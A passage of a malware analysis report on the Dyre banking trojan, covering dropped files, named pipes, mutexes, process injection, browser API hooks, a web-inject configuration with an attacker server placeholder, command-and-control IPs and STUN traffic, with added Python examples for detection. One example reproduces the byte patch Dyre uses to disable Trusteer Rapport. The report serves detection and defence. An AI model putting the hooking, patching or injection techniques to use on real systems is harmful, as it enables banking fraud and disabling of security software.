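    """Map 'key\\value' -> indicator list for every entry that fired at least once."""
    report: Dict[str, List[str]] = {}
    for entry in entries:
        hits = indicators(entry)
        if hits:
            report[f"{entry[0]}\\{entry[1]}"] = hits
    return report


# Constructed sample in the shape of the dump above; the last entry is a benign control.
SAMPLE_ENTRIES: List[RegEntry] = [
    ("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\googleupdate", "ImagePath",
     "hex(2):43,3a,5c,57,49,4e,44,4f,57,53,5c,43,48,55,6e,46,61,57,4c,67,66,4a,54,42,64,77,2e,65,78,65,00,"),
    ("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\googleupdate", "DisplayName",
     '"Google Update Service"'),
    ("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "GoogleUpdate",
     '"C:\\Documents and Settings\\Administrator\\Application Data\\googleupdaterr.exe"'),
    ("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "@",
     '"C:\\Documents and Settings\\Administrator\\Application Data\\EDPBxttMFiiCodB.exe"'),
    ("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "ctfmon.exe",
     '"C:\\WINDOWS\\system32\\ctfmon.exe"'),
]

if __name__ == "__main__":
    for where, hits in scan(SAMPLE_ENTRIES).items():
        print(where, "->", ", ".join(hits))
```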

Dropped Files
Service
Windows XP
C:\WINDOWS\38f4f489bd7.INI                                              1 KB
C:\WINDOWS\CHUnFaWLgfJTBdw.exe                                          439 KB **
C:\WINDOWS\CHUnFaWLgfJTBdw.INI                                          1 KB
C:\WINDOWS\system32\config\systemprofile\Application Data\2ete64.vas    2 KB
** The executable with the 15 random upper or lower case chars is the most common.

XRider Version Windows XP
C:\Documents and Settings\Administrator\Application Data\cmd.exe                 291 KB
C:\Documents and Settings\Administrator\Application Data\userdata.dat            1 KB

diper89 Version Windows XP
C:\Documents and Settings\Administrator\Application Data\googleupdaterr.exe      257 KB
C:\Documents and Settings\Administrator\Application Data\userdata.dat            1 KB

C:\Documents and Settings\Administrator\Application Data\EDPBxttMFiiCodB.exe     451 KB
C:\WINDOWS\system32\config\systemprofile\Application Data\d6r5g4da.db            1 KB
C:\WINDOWS\<DROPPER NAME>.INI                                                    1 KB

Pipes
The injected process communicates with the main process by using named pipes. The names are hardcoded, similar to the mutexes. The pipe is created in stage 6.

seg000:00A05044     push    0
seg000:00A05046     push    0
seg000:00A05048     push    3
seg000:00A0504A     push    0
seg000:00A0504C     push    0
seg000:00A0504E     push    0C0000000h
seg000:00A05053     push    offset a_PipeCmvn5e4d4      ; "\\\\.\\pipe\\cmvn5e4d4r"
seg000:00A05058     call    ebx                         ; CreateFileW
seg000:00A0505A     mov     esi, eax


It uses the named pipe to pass commands and variables back and forth. Within the injected process there are a number of different requested variables: "btid", "ccsr", "btnt", "slip", "newp", "slpr" and "ppsr".

\\.\pipe\Xider78Pipe
\\.\\pipe\\cmvn5e4d4r
\\.\pipe\Diper89Pipe
\\.\pipe\net\NtControlPipe10

Mutex
The mutexes are hardcoded and are generated during stage 6. The below mutexes were found via OSINT.
Global\1g2hk1hyj
Global\\553wwerdty7
Global\cdv5b74f5y7
Xider78
Diper89

Functionality Overview
This section contains generic functionality that Dyre is capable of. There is room for improvement in regards to the networking.

Enumerating processes
Calls CreateToolhelp32Snapshot to get a snapshot of all running processes. For each process name it calls StrStrIW to see if the searched process matches. If not, it will call Process32NextW to get the next process name. In stage 4 explorer.exe or svchost.exe is searched for. In stage 6 the injected process searches for chrome.exe, firefox.exe and/or iexplore.exe.

Process Injection
The process injection uses NtMapViewOfSection, VirtualAlloc, NtQuerySystemInformation, OpenThread and NtQueueApcThread rather than the standard WriteProcessMemory, SetThreadContext and CreateRemoteThread.

Host IP Retrieval
Gets the host IP from a STUN server or a third party service. Please see the section Network Traffic Patterns for more details.

VNC
The code responsible for VNC is a separate module. It is not present in the executable. The module looks to be a DLL that has three known exports: ClientSetModule, VncStartServer and VncStopServer. The latter export names are present in the Carberp source leak at Carberp/source - absource/pro/all source/hvnc_dll/HVNCLib/hvnc.h. There is the possibility this is a modified version of the leaked code, but without the module there is no way to know for sure. This same function is also used for the tv32 cmd. The modules are internally named VNCModule and TVModule.

Other functionality not worth researching:
Decrypting of files stored as RCDATA in the resources
Creation and execution of files in the %TEMP% directory
Stores configuration in a log file
Requires having SeDebugPrivilege rights
Collects information about the host
Redirects

Commands & Configurations


Commands & Configurations
Some of these are internal commands that are passed through the named pipe while others are commands from the command and control.
sfile          send file
logkeys
logpost        log POST requests
cert
vnc32
tv32
bcc
browsnapshot
generalinfo
httprdc
btid           passed on the pipe
ccsr
btnt
slip
pls
spp
setp
newp           new process
slpr
ppsr

Injects Configurations
The configurations for the browser injects are stored as XML. These are used in stage 7 in the injected process. There are three parent tags: serverlist, localitems and rpci.


<serverlist>
  <server>
    <sal>BANK_URL</sal>
    <saddr>ATTACKER_IP:PORT</saddr>
  </server>
</serverlist>

<localitems>
  <litem>
    SUB.BANK_URL.com/FOLDER/*
    SUB.BANK_URL1.com/FOLDER/*
    SUB.BANK_URL2.com/FOLDER/*
  </litem>
</localitems>

Unfortunately I could not find an example for rpci.

Error Codes
Dyre has extensive error handling and feedback for the developers. Error handling functionality can be found throughout the code.
0FCC20002h   Chrome PE parsing failed
0FCC20000h   Unknown Chrome related
0FCC10001h   FireFox hook failed
0FCC10000h   Unknown FireFox related
0FCCC0001h   Internet Explorer WinInet hook failed
0FCCC0000h   Internet Explorer WinInet parsing failed or timestamp not found

Hooks
Process specific hooks for logging browser traffic. The hooks happen in stage 7, which runs in the injected process. The injected process name will be firefox.exe, chrome.exe or iexplore.exe.

FireFox Hooks
The sample uses the standard approach to hook traffic in Firefox. It attempts to load NSPR4.DLL or NSS3.DLL. It will then call GetProcAddress to get the address and then add an inline hook for the following APIs.
PR_Read
PR_Write
PR_Close
Parses the below requests if PR_Write is called
GET
PUT
POST

Parses the below requests if PR_Read is called
HTTP
HTTPS
POST
The hooking of PR_Read and PR_Write has been used by malware since at least December of 2009. Likely earlier, as the first post discussing this technique was by a user named oxman on the Mozilla forums in January of 2007.

Internet Explorer Hooks


The first two hooks use a GetProcAddress approach to find the addresses of LoadLibraryExW and CreateProcessInternalW. When hooking WinInet.dll Dyre does something rather unique. It does this to bypass heuristic based detection. Dyre will read the timestamp of WinInet.dll and then compare it to a list of known timestamps for WinInet.dll. The list contains every timestamp for WinInet.dll from '2004-08-04 01:53:22' to '2014-07-25 04:04:59'.

seg000:00A0C05F                 db 0
seg000:00A0C060 TimeStampList   dd 4110941Bh            ; DATA XREF: TimeStamp:_loop r
seg000:00A0C064 dword_A0C064    dd 0                    ; DATA XREF: TimeStamp+1C r
seg000:00A0C064                                         ; TimeStamp:loc_A07A0D r ...
seg000:00A0C068                 dd 411095F2h            ; <- Timestamp
seg000:00A0C06C                 dd 0                    ; <- WinInet index
seg000:00A0C070                 dd 4110963Fh
seg000:00A0C074                 dd 0
seg000:00A0C078                 dd 4110967Dh
seg000:00A0C07C                 dd 0
seg000:00A0C080                 dd 411096D4h
seg000:00A0C084                 dd 0
seg000:00A0C088                 dd 411096DDh
seg000:00A0C08C                 dd 0
seg000:00A0C090                 dd 41252C1Bh
seg000:00A0C094                 dd 0
seg000:00A0C098                 dd 41252C9Fh
seg000:00A0C09C                 dd 0
seg000:00A0C0A0                 dd 41253332h
seg000:00A0C0A4                 dd 0
seg000:00A0C0A8                 dd 41F9216Ch
seg000:00A0C0AC                 dd 1
seg000:00A0C0B0                 dd 435862A0h
seg000:00A0C0B4                 dd 2
seg000:00A0C0B8                 dd 43C2A6A9h
seg000:00A0C0BC                 dd 3
....
seg000:00A0D230                 dd 4CE7BA3Fh
seg000:00A0D234                 dd 78h
seg000:00A0D238                 dd 53860FB3h
seg000:00A0D23C                 dd 79h
seg000:00A0D240                 dd 53D22BCBh
seg000:00A0D244                 dd 7Ah

>>> datetime.datetime.fromtimestamp(0x411095F2).strftime('%Y-%m-%d %H:%M:%S')
'2004-08-04 01:53:22'

>>> datetime.datetime.fromtimestamp(0x53D22BCB).strftime('%Y-%m-%d %H:%M:%S')
'2014-07-25 04:04:59'

If an error occurs during the parsing process the sample will check if the hash of the DLL is known to the server. If not, it will use the "sfile" command to send the file back to the command and control.

'/%s/%s/63/file/%s/%s/%s/'
"Check wininet.dll on server failed"
"Send wininet.dll failed"

If the timestamp is found, the value below it is used as an index to grab the address of where the hook should happen. For example, if the timestamp was 4802A13Ah it would be found at the 49th entry.

seg000:00A0C1E8                 dd 4802A13Ah            ; <- '2008-04-13 18:11:38'
seg000:00A0C1EC                 dd 15h                  ; <- index 21

seg000:00A07A0D     movsx   edx, word ptr ds:TimeStampIndex[eax*8]   ; edx = 21
seg000:00A07A15     lea     edx, [edx+edx*2]                          ; edx = 63
seg000:00A07A18     mov     edx, ds:offset[edx*4]
seg000:00A07A1F     mov     [ecx], edx                                ; save off value

Python> hex(0x0A0D3E0 + (21 + 21*2) * 4)
0xa0d4dc

seg000:00A0D4DC                 dw 0F3Ch                ; 0x0f3C offset to inline hook in wininet
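An added example (not the report's code) that parses timestamp/index pairs in the form of the listing above and follows the index calculation from the disassembly to the offset record. The table bytes, the offset-table base 0x0A0D3E0 and the single 12-byte record at 0xA0D4DC are constructed from the values on this page; timestamps are rendered in UTC rather than the local time shown in the report's Python session.

```python
"""Parse Dyre's WinInet timestamp/index table and resolve a hook offset (added example)."""
import struct
from datetime import datetime, timezone
from typing import Dict, Optional

# lea edx, [edx+edx*2] ; mov edx, [edx*4]  -> each offset record is three dwords (12 bytes)
RECORD_DWORDS = 3


def parse_timestamp_table(blob: bytes) -> Dict[int, int]:
    """Map timestamp -> index for every (dd timestamp, dd index) pair in the blob."""
    if len(blob) % 8:
        raise ValueError("table must be a whole number of 8-byte entries")
    return {ts: idx for ts, idx in struct.iter_unpack("<II", blob)}


def timestamp_to_utc(ts: int) -> str:
    """Render a PE TimeDateStamp as UTC (the report printed local time)."""
    return datetime.fromtimestamp(ts, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S")


def record_address(offsets_base: int, index: int) -> int:
    """Address of the index'th record: base + (index + index*2) * 4, as in the disassembly."""
    return offsets_base + (index + index * 2) * 4


def hook_offset(ts: int, table: Dict[int, int], offsets_base: int,
                memory: Dict[int, bytes]) -> Optional[int]:
    """Resolve a wininet.dll timestamp to its inline-hook offset, or None if unknown.

    `memory` maps record addresses to their 12 bytes (a stand-in for reading the
    injected image). Only the first word of the record is used, like `dw 0F3Ch`.
    A missing timestamp is the case the report's error 0FCCC0000h describes.
    """
    idx = table.get(ts)
    if idx is None:
        return None
    rec = memory.get(record_address(offsets_base, idx))
    if rec is None or len(rec) < RECORD_DWORDS * 4:
        return None
    return struct.unpack_from("<H", rec)[0]


# Constructed table: a few entries from the listing, including the worked example.
TABLE_BLOB = struct.pack("<10I",
                         0x411095F2, 0,
                         0x4110963F, 0,
                         0x41F9216C, 1,
                         0x4802A13A, 0x15,
                         0x53D22BCB, 0x7A)
OFFSETS_BASE = 0x0A0D3E0
# Constructed record at 0xA0D4DC: dw 0F3Ch followed by two dwords not shown on the page (zeroed).
MEMORY = {0xA0D4DC: struct.pack("<H", 0x0F3C) + b"\x00" * 10}

if __name__ == "__main__":
    table = parse_timestamp_table(TABLE_BLOB)
    for ts in sorted(table):
        print(f"{ts:08X} {timestamp_to_utc(ts)} index={table[ts]}")
    print(hex(hook_offset(0x4802A13A, table, OFFSETS_BASE, MEMORY)))
```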

* ICSecureSocket::Send_Fsm(CFsm_SecureSend *)

77200F37  90            NOP
77200F38  90            NOP
77200F39  90            NOP
77200F3A  90            NOP
77200F3B  90            NOP
77200F3C  E9 C7F0398A   JMP 015A0008                    ; <- inline hook
015A0008  68 4077A000   PUSH 0A07740
015A000D  C3            RETN
00A07740  55            PUSH EBP
00A07741  8BEC          MOV EBP,ESP
00A07743  83EC08        SUB ESP,8
00A07746  894DFC        MOV DWORD PTR SS:[EBP-4],ECX
00A07749  682077A000    PUSH 0A07720
00A0774E  FF7508        PUSH DWORD PTR SS:[EBP+8]
00A07751  FF75FC        PUSH DWORD PTR SS:[EBP-4]
00A07754  FF1594DEA000  CALL DWORD PTR DS:[A0DE94]
00A0775A  8945F8        MOV DWORD PTR SS:[EBP-8],EAX
00A0775D  8B4DFC        MOV ECX,DWORD PTR SS:[EBP-4]
00A07760  8B45F8        MOV EAX,DWORD PTR SS:[EBP-8]
00A07763  8BE5          MOV ESP,EBP
00A07765  5D            POP EBP

*ICSecureSocket::Receive_Fsm(classCFsm_SecureReceive*)
77201D4AE9B9E23B8A JMP015C0008
015C0008
689077A000 PUSH0A07790
015C000D
C3
RETN
00A07790
00A07791
00A07793
00A07796
00A07799
00A0779E
00A077A1
00A077A4
00A077AA
00A077AD
00A077B0
00A077B3
00A077B5
00A077B6

55
PUSHEBP
8BEC
MOVEBP,ESP
83EC08
SUBESP,8
894DFC
MOVDWORDPTRSS:[EBP4],ECX
687077A000 PUSH0A07770
FF7508
PUSHDWORDPTRSS:[EBP+8]
FF75FC
PUSHDWORDPTRSS:[EBP4]
FF1598DEA000CALLDWORDPTRDS:[A0DE98]
8945F8
MOVDWORDPTRSS:[EBP8],EAX
8B4DFC
MOVECX,DWORDPTRSS:[EBP4]
8B45F8
MOVEAX,DWORDPTRSS:[EBP8]
8BE5
MOVESP,EBP
5D
POPEBP
C20400
RETN4
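The hook chain above, decoded from raw bytes as an added example (not code from the report or the sample): follow the E9 rel32 at the wininet entry to the push/ret stub and on to the handler, and flag any export whose first instruction leaves the module. The bytes at 0x77200F3C, 0x015A0008, 0x77201D4A and 0x015C0008 are the ones in the listings; the 0x77200000/0x100000 module range, the clean entry at 0x77203000 and the address-to-bytes "memory" dict are constructed.

```python
# Added example, not code from the report: decode a jmp rel32 -> push/ret
# inline hook and check whether control leaves the owning module.
import struct

WININET_BASE, WININET_SIZE = 0x77200000, 0x00100000   # assumed module range

# Constructed process memory holding only the bytes the listings show,
# plus one constructed unhooked entry (mov edi,edi / push ebp / mov ebp,esp).
MEMORY = {
    0x77200F3C: bytes.fromhex("E9C7F0398A"),      # Send_Fsm entry, hooked
    0x015A0008: bytes.fromhex("684077A000C3"),    # push 0A07740 ; retn
    0x77201D4A: bytes.fromhex("E9B9E23B8A"),      # Receive_Fsm entry, hooked
    0x015C0008: bytes.fromhex("689077A000C3"),    # push 0A07790 ; retn
    0x77203000: bytes.fromhex("8BFF558BEC"),      # constructed clean entry
}


def read(addr: int, n: int) -> bytes:
    """Read n bytes from the constructed memory image."""
    for base, blob in MEMORY.items():
        if base <= addr and addr + n <= base + len(blob):
            return blob[addr - base:addr - base + n]
    raise LookupError(f"no bytes at {addr:#x}")


def decode_jmp_rel32(addr: int):
    """Target of an E9 rel32 jump at addr (target = addr + 5 + rel), or None."""
    code = read(addr, 5)
    if code[0] != 0xE9:
        return None
    rel = struct.unpack("<i", code[1:5])[0]
    return (addr + 5 + rel) & 0xFFFFFFFF


def decode_push_ret(addr: int):
    """Address a 'push imm32 ; retn' stub transfers to, or None if not that shape."""
    code = read(addr, 6)
    if code[0] != 0x68 or code[5] != 0xC3:
        return None
    return struct.unpack_from("<I", code, 1)[0]


def follow_hook(entry: int) -> list:
    """entry -> jmp target -> push/ret target, as far as the chain goes."""
    chain = [entry]
    target = decode_jmp_rel32(entry)
    if target is None:
        return chain
    chain.append(target)
    final = decode_push_ret(target)
    if final is not None:
        chain.append(final)
    return chain


def is_hooked(entry: int, base: int = WININET_BASE, size: int = WININET_SIZE) -> bool:
    """Hooked if the entry redirects and the chain ends outside the module."""
    chain = follow_hook(entry)
    return len(chain) > 1 and not (base <= chain[-1] < base + size)


if __name__ == "__main__":
    for entry in (0x77200F3C, 0x77201D4A, 0x77203000):
        print(f"{entry:#010x}: {[hex(a) for a in follow_hook(entry)]} hooked={is_hooked(entry)}")
```

On a live host the same logic applies to memory read out of the browser process (ReadProcessMemory or a minidump): compare each exported or known-interesting wininet entry against the on-disk copy, and for any E9 at offset 0 walk the chain and see where it ends. The two-stage stub matters for detection because the jump target (0x015A0008) is a tiny scratch allocation, not the handler; only the push/ret reveals the injected module at 0xA07740.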

Chrome Hooks
The first hook is LoadLibraryExW. The rest of the hooks failed. Will investigate at a later date.

Anti-Detection functionality
The first stage is randomized and typically has a low detection score.
Process injection of a DLL that is not listed as a loaded module.
Disabling/patching of Trusteer Rapport inside the injected process. This happens in stage 7.
Please see below for more details.

Disabling RapportGP
Checks whether RapportGP.dll (Trusteer Rapport's browser-side component) is a loaded module in the browser. If it is, the sample searches the module for one of two byte patterns and patches it in place. Both patterns are a function epilogue (restore the SEH chain at fs:0, pop the callee-saved registers, retn 4) and differ only in the stack offset (50h versus 58h); the patch replaces the first instruction, mov eax, esi, with xor eax, eax, so the patched function always returns 0 instead of the result it computed in esi. The searched and replaced bytes are listed below.

First Bytes Searched
seg000:00A0C000 8B C6                   mov     eax, esi
seg000:00A0C002 8B 4C 24 50             mov     ecx, [esp+50h]
seg000:00A0C006 64 89 0D 00 00 00 00    mov     large fs:0, ecx
seg000:00A0C00D 59                      pop     ecx
seg000:00A0C00E 5F                      pop     edi
seg000:00A0C00F 5E                      pop     esi
seg000:00A0C010 5B                      pop     ebx
seg000:00A0C011 8B E5                   mov     esp, ebp
seg000:00A0C013 5D                      pop     ebp
seg000:00A0C014 C2 04 00                retn    4

First Bytes Patched
seg000:00A0C018 31 C0                   xor     eax, eax
seg000:00A0C01A 8B 4C 24 50             mov     ecx, [esp+50h]
seg000:00A0C01E 64 89 0D 00 00 00 00    mov     large fs:0, ecx
seg000:00A0C025 59                      pop     ecx
seg000:00A0C026 5F                      pop     edi
seg000:00A0C027 5E                      pop     esi
seg000:00A0C028 5B                      pop     ebx
seg000:00A0C029 8B E5                   mov     esp, ebp
seg000:00A0C02B 5D                      pop     ebp
seg000:00A0C02C C2 04 00                retn    4

2nd Bytes Searched
seg000:00A0C030 8B C6                   mov     eax, esi
seg000:00A0C032 8B 4C 24 58             mov     ecx, [esp+58h]
seg000:00A0C036 64 89 0D 00 00 00 00    mov     large fs:0, ecx
seg000:00A0C03D 59                      pop     ecx
seg000:00A0C03E 5F                      pop     edi
seg000:00A0C03F 5E                      pop     esi
seg000:00A0C040 5B                      pop     ebx
seg000:00A0C041 8B E5                   mov     esp, ebp
seg000:00A0C043 5D                      pop     ebp
seg000:00A0C044 C2 04 00                retn    4

2nd Bytes Patched
seg000:00A0C048 31 C0                   xor     eax, eax
seg000:00A0C04A 8B 4C 24 58             mov     ecx, [esp+58h]
seg000:00A0C04E 64 89 0D 00 00 00 00    mov     large fs:0, ecx
seg000:00A0C055 59                      pop     ecx
seg000:00A0C056 5F                      pop     edi
seg000:00A0C057 5E                      pop     esi
seg000:00A0C058 5B                      pop     ebx
seg000:00A0C059 8B E5                   mov     esp, ebp
seg000:00A0C05B 5D                      pop     ebp
seg000:00A0C05C C2 04 00                retn    4
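The search-and-patch above, as an added example (not code from the report or the sample): find the two Rapport epilogue patterns in a code image, apply the same two-byte replacement the sample applies, and, for the defender, flag a copy of the module that already carries the patched epilogue. The two searched patterns and the 31 C0 replacement are the bytes from the listings; the filler bytes around them that stand in for RapportGP.dll's code are constructed.

```python
# Added example, not code from the report: signature search, in-place patch
# (mov eax,esi -> xor eax,eax) and a tamper check for the RapportGP epilogues.
from __future__ import annotations
import re

# Common tail of both patterns: mov large fs:0,ecx / pop ecx / pop edi /
# pop esi / pop ebx / mov esp,ebp / pop ebp / retn 4
_TAIL = "64890D00000000" "59" "5F" "5E" "5B" "8BE5" "5D" "C20400"
SEARCHED = [
    bytes.fromhex("8BC6" "8B4C2450" + _TAIL),   # mov eax,esi ; mov ecx,[esp+50h] ; ...
    bytes.fromhex("8BC6" "8B4C2458" + _TAIL),   # mov eax,esi ; mov ecx,[esp+58h] ; ...
]
PATCH = bytes.fromhex("31C0")                   # xor eax,eax: the function now returns 0
PATCHED = [PATCH + p[2:] for p in SEARCHED]     # what the sample leaves behind in memory


def find_all(module: bytes, pattern: bytes) -> list[int]:
    """Offsets of every (non-overlapping) occurrence of pattern in module."""
    return [m.start() for m in re.finditer(re.escape(pattern), module)]


def apply_patch(module: bytes) -> tuple[bytes, list[int]]:
    """Patch every searched epilogue the way the sample does. Returns the new
    image and the offsets that changed; only the first two bytes are touched."""
    buf = bytearray(module)
    hits = []
    for pat in SEARCHED:
        for off in find_all(bytes(buf), pat):
            buf[off:off + 2] = PATCH
            hits.append(off)
    return bytes(buf), sorted(hits)


def patched_epilogues(module: bytes) -> list[int]:
    """Defender check: offsets where a Rapport epilogue reads xor eax,eax
    instead of mov eax,esi, i.e. where the sample has already been."""
    hits = []
    for pat in PATCHED:
        hits.extend(find_all(module, pat))
    return sorted(hits)


def build_module() -> bytes:
    """Constructed stand-in for RapportGP.dll code: filler around both epilogues."""
    filler = bytes(range(256)) * 2
    return filler + SEARCHED[0] + filler + SEARCHED[1] + filler


if __name__ == "__main__":
    original = build_module()
    print("searched patterns at", find_all(original, SEARCHED[0]), find_all(original, SEARCHED[1]))
    tampered, changed = apply_patch(original)
    print("patched offsets", changed, "detected", patched_epilogues(tampered))
```

On a real host the input to patched_epilogues() would be the in-memory image of RapportGP.dll read out of the browser process; comparing that image against the on-disk file at the hit offsets gives the same answer without a signature, which is the more general check when the vendor changes the epilogue.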

Command and Control


Third Party Resources
abuse.ch SSL Fingerprint Blacklist for Suricata
https://sslbl.abuse.ch/blacklist/sslblacklist.rules

URLs & IPs


The IPs below were extracted from memory dumps of Dyre samples. This is a small set. Note that all of them listen on non-standard high ports (15000, 19000, 19001), which on its own is a useful egress-filtering and detection signal.

188.165.209.117:19001
https://www.virustotal.com/en/ip-address/188.165.209.117/information/
188.165.214.17:19000
https://www.virustotal.com/en/ip-address/188.165.214.17/information/
188.165.216.217:19000
https://www.virustotal.com/en/ip-address/188.165.216.217/information/
216.55.182.19:19000
https://www.virustotal.com/en/ip-address/216.55.182.19/information/
37.59.42.107:19000
https://www.virustotal.com/en/ip-address/37.59.42.107/information/
94.23.0.200:19000
https://www.virustotal.com/en/ip-address/94.23.0.200/information/
94.23.2.19:19000
https://www.virustotal.com/en/ip-address/94.23.2.19/information/
94.23.221.154:19000
https://www.virustotal.com/en/ip-address/94.23.221.154/information/
94.23.236.54:15000
https://www.virustotal.com/en/ip-address/94.23.236.54/information/

Network Traffic Patterns


When testing the network connection it will make a request to google.com or microsoft.com. The initial URL is chosen randomly. It will attempt to check the connection for a minute and a half.

No.  Time        Source           Destination      Protocol  Length  Info
57   203.133562  192.168.195.129  74.125.225.164   TCP       62      remoteas > http [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM=1
58   203.187092  74.125.225.164   192.168.195.129  TCP       60      http > remoteas [SYN, ACK] Seq=0 Ack=1 Win=64240 Len=0 MSS=1460
59   203.188628  192.168.195.129  74.125.225.164   TCP       54      remoteas > http [ACK] Seq=1 Ack=1 Win=64240 Len=0
69   210.736318  192.168.195.129  74.125.225.164   TCP       54      remoteas > http [FIN, ACK] Seq=1 Ack=1 Win=64240 Len=0
70   210.747798  74.125.225.164   192.168.195.129  TCP       60      http > remoteas [ACK] Seq=1 Ack=2 Win=64239 Len=0
71   210.787583  74.125.225.164   192.168.195.129  TCP       60      http > remoteas [FIN, PSH, ACK] Seq=1 Ack=2 Win=64239 Len=0
72   210.787877  192.168.195.129  74.125.225.164   TCP       54      remoteas > http [ACK] Seq=2 Ack=2 Win=64240 Len=0

Note that no HTTP request is ever sent: the check completes a TCP handshake to port 80 and closes the socket about seven seconds later, with Len=0 on every segment. A rule that looks for an HTTP GET to google.com or microsoft.com will therefore miss it; the DNS lookup followed by a bare connect and close is the observable.

Once it has verified that the machine has a connection it will try to get the machine's external IP address through a request to a STUN (Session Traversal Utilities for NAT) server. Dyre will randomly choose one of the following STUN servers.

stun1.voiceeclipse.net
stun.callwithus.com
stun.sipgate.net
stun.ekiga.net
stun.ideasip.com
stun.internetcalls.com
stun.noc.amsix.net
stun.phonepower.com
stun.voip.aebc.com
stun.voipbuster.com
stun.voxgratia.org
stun.ipshka.com
stun.faktortel.com.au

stun.iptel.org
stun.voipstunt.com
stunserver.org
203.183.172.196:3478
s1.taraba.net
s2.taraba.net
stun.l.google.com:19302
stun1.l.google.com:19302
stun2.l.google.com:19302
stun3.l.google.com:19302
stun4.l.google.com:19302
stun.schlund.de
stun.rixtelecom.se
stun.voiparound.com
numb.viagenie.ca
stun.stunprotocol.org
stun.2talk.co.nz

From a SOC perspective, rules could be created for a DNS request for google.com or microsoft.com followed by a connection to one of the above STUN servers. If the initial request is google.com it would obviously make no sense to flag a connection to a Google-hosted STUN server. While searching for samples I found it rare to see non-malicious executables connect to the non-Google STUN servers. If the attempt to get the machine's IP via a STUN server fails it will use the third-party site icanhazip.com to return the IP address.

Appendix:
Strings
Stage 6 - Dyre
!This program cannot be run in DOS mode.
_RichL
.text
.rdata
@.data
.rsrc
%s:%d
%d/%s/%s
empty
Win_7
Win_7_SP1
Win_XP
Win_8

Win_8.1
Win_Server_2003
Win_Vista_SP2
Win_Vista
Win_Vista_SP1
unknown
_32bit
/%s/%s/0/%s/%d/%s/
/%s/%s/%d/%s/
/%s/%s/%d/%s/%s/
/%s/%s/5/%s/%s/
Wget/1.9+cvs-stable (Red Hat modified)
vnc32
httprdc
/%s/%s/23/%d/%s/%s/
%s/%s/0
error
noname
RtlTimeToSecondsSince1970
text/plain; charset=UTF-8
text/plain; charset=UTF-16
image/jpeg
application/octet-stream
text/plain
%sbound%d
Content-Disposition: form-data; name="%s"
Content-Type:
%s
Content-Type: multipart/form-data; boundary=
Content-Length:
Accept: text/html
Connection: Keep-Alive
%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X
%s_W%d%d%d.%s
botid
success
0.0.0.0:0
config
http://icanhazip.com
No NAT
Full Cone NAT
UDP Firewall
Port restricted NAT
Address restricted NAT
Symmetric NAT
unknown NAT
CONSTRAINT
%I64d
"profile"
"info_cache"
tablecookiescookies
indexsqlite_autoindex_cookies_1cookies
tablemoz_cookiesmoz_cookies
NSS_Initialize
NSS_Shutdown
PR_Init
PR_Cleanup
PL_ArenaFinish
SECITEM_AllocItem
SECITEM_DupItem
SECITEM_ZfreeItem
SEC_PKCS12EnableCipher
SEC_PKCS12SetPreferredCipher
SEC_PKCS12CreateExportContext
SEC_PKCS12DestroyExportContext
SEC_PKCS12CreateUnencryptedSafe
SEC_PKCS12CreatePasswordPrivSafe
SEC_PKCS12AddCertAndKey
SEC_PKCS12AddPasswordIntegrity
SEC_PKCS12Encode
CERT_GetDefaultCertDB
CERT_DestroyCertList
PORT_UCS2_UTF8Conversion
PORT_SetUCS2_ASCIIConversionFunction
PK11_Authenticate
PK11_GetInternalKeySlot
PK11_FreeSlot
PK11_ListCerts
PK11_NeedUserInit
PK11_InitPin
SEC_PKCS12DecoderStart
SEC_PKCS12DecoderUpdate
SEC_PKCS12DecoderImportBags
SEC_PKCS12DecoderFinish
SEC_PKCS12DecoderVerify

SEC_PKCS12DecoderValidateBags
\Mozilla\Firefox\
profiles.ini
IsRelative
secmod.db
%d.%d.%d.%d
browsnapshot
generalinfo
canotgetconfig
backconn
startfail
ClientSetModule
VncStartServer
VncStopServer
222289DD9234C9CA94E3E60D08C77777
VNCModule
TVModule
AUTOBACKCONN
startfailed
cannotgetVNC
cannotgetTV
sendbrowsersnapshotfailed
sendsysteminfofailed
bcsrv
1609uk4
C~h!f@
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
</requestedPrivileges>
</security>
</trustInfo>
00000001E00D00001001E00D 00*02090c0m0x0
SeDebugPrivilege
ntdll.dll
Tu2xwersd1
\\.\pipe\cmvn5e4d4r
Roaming
Local
d6r5g4da.db

google.com
microsoft.com
stun1.voiceeclipse.net
stun.callwithus.com
stun.sipgate.net
stun.ekiga.net
stun.ideasip.com
stun.internetcalls.com
stun.noc.amsix.net
stun.phonepower.com
stun.voip.aebc.com
stun.voipbuster.com
stun.voxgratia.org
stun.ipshka.com
stun.faktortel.com.au
stun.iptel.org
stun.voipstunt.com
stunserver.org
203.183.172.196:3478
s1.taraba.net
s2.taraba.net
stun.l.google.com:19302
stun1.l.google.com:19302
stun2.l.google.com:19302
stun3.l.google.com:19302
stun4.l.google.com:19302
stun.schlund.de
stun.rixtelecom.se
stun.voiparound.com
numb.viagenie.ca
stun.stunprotocol.org
stun.2talk.co.nz
*.txt
\Google\Chrome\User Data\
Local State
%s%hs\Cookies
\Mozilla\Firefox\
profiles.ini
IsRelative
\cookies.sqlite
12345
CurrentVersion
SOFTWARE\Mozilla\Mozilla Firefox
SOFTWARE\Mozilla\Mozilla Firefox\
\Main
InstallDirectory
nss3.dll
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\
Display
DisplayName
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
DisplayVersion
Version
Mozilla Firefox
svcVersion
SOFTWARE\Microsoft\Internet Explorer
Internet Explorer
1s3bu472s
tgdx6dr85
du1xdfy2dv
Software\Microsoft\Windows\CurrentVersion\Uninstall
SYSTEM\CurrentControlSet\services
Global\553wwerdty7
D:P(A;;GA;;;SY)(A;;GA;;;BA)(A;;GA;;;WD)(A;;GA;;;RC)S:(ML;;NW;;;LW)
chrome.exe
firefox.exe
iexplore.exe

Stage 7 - Injected Process

!This program cannot be run in DOS mode.
.text
.rdata
@.data
.rsrc
@.reloc
